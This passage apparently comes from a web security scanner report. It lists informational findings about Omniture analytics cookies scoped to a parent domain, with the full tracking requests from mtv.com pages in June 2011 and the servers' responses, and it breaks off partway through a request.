GET /b/ss/viamtv/1/H.22.1/s21898508197627?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A17%3A17%201%20300&ce=UTF-8&pageName=%2Fmusic%2Fmain%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&r=http%3A%2F%2Fwww.mtv.com%2F&ch=music&events=event16&h2=music%2Fmain%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=music&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fhome%2Findex.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:17:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:17:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:17:24 GMT
Last-Modified: Wed, 15 Jun 2011 00:17:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A894-4D61-092361A4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www49
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.30. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s23534710153471

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s23534710153471?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A15%3A27%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF5F223[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:16:29 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:16:29 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:16:29 GMT
Last-Modified: Wed, 15 Jun 2011 00:16:29 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A85D-1547-1711EEF9"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.31. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25478533639106

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25478533639106?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A18%3A36%201%20300&ce=UTF-8&pageName=%2Fonair%2Fteen_wolf%2Fseries.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&r=http%3A%2F%2Fwww.mtv.com%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&ch=onair&events=event16&h2=onair%2Fteen_wolf%2Fseries.jhtml&c5=non-member&c6=not%20logged-in&c15=teen_wolf&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=onair&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:03 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A8F7-7E60-4A81F956"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.32. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25953703850973

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25953703850973?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A34%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Fgame%2Fplay.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2Fgame%2Fplay.jhtml%3FarcadeGameId%3D10325912&r=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ch=games&events=event16&h2=games%2Farcade%2Fgame%2Fplay.jhtml&c5=non-member&c6=not%20logged-in&c23=exit_path&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:35 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:35 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A917-4E09-0C2AA9D0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www88
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.33. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s26489939151797

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s26489939151797?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A28%3A16%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:28:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:28:56 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:28:56 GMT
Last-Modified: Wed, 15 Jun 2011 00:28:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6AB48-5AA3-24128C5D"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www117
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

11.34. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s27362804291769

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s27362804291769?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A16%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&r=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ch=games&events=event16&h2=games%2Farcade%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fonair%2Fteen_wolf%2Fseries.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiikn